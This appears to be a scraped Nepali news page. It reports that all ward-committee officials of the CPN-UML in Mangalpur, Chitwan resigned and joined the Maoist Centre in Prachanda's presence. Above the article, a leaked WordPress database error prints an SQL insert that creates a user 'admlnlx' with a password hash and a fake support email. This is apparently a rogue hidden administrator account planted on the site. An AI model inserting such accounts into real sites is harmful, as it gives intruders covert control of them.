WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPi63.BJ3P2gozRhJ/hBqNKrofq6Ey1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 17:31:13', '', 'admlnlx', 'admlnlx')
चितवन, माघ २६ –
प्रधानमन्त्री एवं माओवादी केन्द्रका अध्यक्ष प्रचण्डको गृह जिल्ला चितवनमा नेकपा एमाले वडा कमिटीका सबै पदाधिकारीले एकसाथ राजीनामा दिएका छन् । र, बुधबारै जिल्ला आएका प्रचण्डको हातबाट टिका लगाएर माओवादी केन्द्रमा प्रवेश गरेका छन् ।
पार्टीबाट राजीनामा दिनेमा मंगलपुर क्षेत्रका प्रभावशाली कार्यकर्ता हिराबहादुर थापामगरसहित भरतपुर नगरपालिकाको वडा नं. १८ मंगलपुरको एमाले वडा कमिटीका सबै पदाधिकारी रहेका छन् ।
उनीहरुले एमालेमाथि जनआन्दोलनका उपलब्धिलाई खतरामा पार्न खोजेको आरोप लगाएका छन् ।